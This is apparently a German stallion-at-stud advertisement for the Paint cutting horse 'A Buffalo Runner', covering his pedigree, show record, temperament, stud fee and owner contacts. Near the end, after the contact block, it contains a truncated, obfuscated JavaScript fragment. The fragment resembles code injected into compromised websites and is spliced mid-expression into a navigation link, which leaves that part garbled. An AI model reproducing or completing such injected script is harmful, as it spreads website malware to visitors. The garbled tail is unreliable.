A Buffalo Runner

„Jack“ ist doppelt registriert, gekört und HERDA n/n, PSSM n/n getestet.
Im Papier : Smart Little Lena, Colonel Freckles, Peppy San Badger, Mr Gun Smoke, Poco Bueno … da bleiben keine Wünsche unerfüllt!

Während des Trainings am Rind hat man von Anfang an seinen Cow Sense erkannt und sein körperliches Vermögen machte es einen leicht, ihn in die richtige Richtung zu bewegen. Bei der Arbeit besticht er mit einer ruhigen Ausstrahlung, die er auch unter fixen Manövern beibehält. Seine Gänge sind weich und ausbalanciert, er hat sich seit dem Anreiten selbst gut getragen und seine Bewegungen am Rind sind auch bei den härtesten Turns und Stops geschmeidig und quick.

Erfolge:
Jack errit 2012 in seinem 1. Showjahr sein ROM im Cutting und steuert nun auf die nächste Saison zu. Ausserdem ist er Highpoint Horse im Open Cutting All Ages des PHCG 2012! Zusätzlich ist er in die Weltrangliste des APHA in der TOP 10 auf Platz 8 der besten Cutting Performance Horses eingestiegen !

Vater, Mutter und Vollbruder haben schon jeweils über 30.000 $ in Cutting gewonnen und der Bruder ist zu dem noch ein Cutting Futurity Champion.

Wie viele Cutting gezogene Pferde besitzt auch unser Cuttinghengst eine sehr gute Veranlagung für den Reiningsport, die er mit seinem kompakten Körperbau und extrem guten Stopps auch weitervererbt. Damit sind für seine Nachzucht viele Einsatzmöglichkeiten gegeben.

Er selber ist ein entspanntes Pferd, welches nicht hibbelig oder übersensible auf alles mögliche reagiert. Diese Coolnes gibt er auch an seine Nachzucht weiter. Ideal für Amateurreiter, die keine überdrehten Cutter reiten möchten. Wer ihn live und in Aktion erleben möchte ist gerne eingeladen, uns zu besuchen! Falls Sie dazu keine Möglichkeit haben, steht auch ein Trainingsvideo zur Verfügung!

abuffalorunner
Decktaxe: 1000€ – LFG
Frühbucherrabatt -200€
ROM-Stuten-Rabatt oder Stuten mit Turniererfolgen

Kontakt:
Besitzer: Jürgen Malo – Logisches Pferdetraining
Trainer: Angie Neldner – Cattle Horses
0049/178/5830662
info@working-cattle.de

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n/" rel="prev">Voriger Beitrag : Interview mit Tom Balding – Bit Maker, Spur Maker and a true Artist

Related posts